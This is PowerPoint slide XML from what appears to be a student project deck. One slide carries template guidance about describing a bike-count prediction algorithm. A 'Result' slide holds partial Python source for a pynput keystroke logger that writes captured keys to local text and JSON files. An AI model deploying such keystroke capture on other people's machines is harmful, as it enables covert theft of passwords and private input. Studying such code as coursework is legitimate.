              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">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indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Library required to build the model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p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr dirty="0" sz="1400" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>In the Algorithm section, describe the machine learning algorithm chosen for predicting bike counts. Here's an example structure for this section:</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="1400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1400" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Algorithm Selection:</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="1400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr dirty="0" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Provide a brief overview of the chosen algorithm (e.g., time-series forecasting model, like ARIMA or LSTM) and justify its selection based on the problem statement and data characteristics.</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1400" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Data Input:</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="1400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr dirty="0" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Specify the input features used by the algorithm, such as historical bike rental data, weather conditions, day of the week, and any other relevant factors.</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1400" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Training Process:</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="1400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr dirty="0" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Explain how the algorithm is trained using historical data. Highlight any specific considerations or techniques employed, such as cross-validation or hyperparameter tuning.</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1400" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Prediction Process:</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="1400" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" lvl="1" marL="629920"/>
            <a:r>
              <a:rPr dirty="0" lang="en-IN">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Detail how the trained algorithm makes predictions for future bike counts. Discuss any real-time data inputs considered during the prediction phase.</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>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5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="729866"/>
            <a:ext cx="11029616" cy="530296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048606" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346454" y="-7654081"/>
            <a:ext cx="4880610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048607" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135374" y="1260162"/>
            <a:ext cx="2956335" cy="5120640"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tk</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> import keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys.write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
